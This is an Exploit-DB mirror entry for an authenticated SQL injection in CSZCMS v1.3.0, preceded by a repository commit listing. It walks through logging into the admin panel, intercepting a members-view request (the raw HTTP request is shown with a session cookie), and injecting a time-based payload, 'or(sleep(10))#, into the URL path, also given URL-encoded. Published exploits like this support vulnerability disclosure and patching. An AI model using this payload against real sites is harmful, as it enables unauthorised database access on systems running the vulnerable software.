exploit-db-mirror/exploits/php/webapps/51916.txt
Exploit-DB a24ba3c94b DB: 2024-03-21
7 changes to exploits/shellcodes/ghdb

HNAS SMU 14.8.7825 - Information Disclosure

Blood Bank 1.0 - 'bid' SQLi

CSZCMS v1.3.0 - SQL Injection (Authenticated)

Employee Management System 1.0 - 'admin_id' SQLi

Simple Task List 1.0 - 'status' SQLi

Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi
2024-03-21 00:16:27 +00:00

42 lines
No EOL
1.1 KiB
Text

# Title: CSZCMS v1.3.0 - SQL Injection (Authenticated)
# Author: Abdulaziz Almetairy
# Date: 27/01/2024
# Vendor: https://www.cszcms.com/
# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Reference: https://github.com/oh-az
# Tested on: Windows 11, MySQL, Apache
# 1 - Log in to the admin portal
http://localhost/cszcms/admin/login
# 2 - Navigate to General Menu > Member Users.
# 3 Click the 'View' button next to any username.
# 4 Intercept the request
GET /cszcms/admin/members/view/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdss
Upgrade-Insecure-Requests: 1
# 5 Modify the paramter
/cszcms/admin/members/view/1
to
/cszcms/admin/members/view/'or(sleep(10))#
and url encode all characters
/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20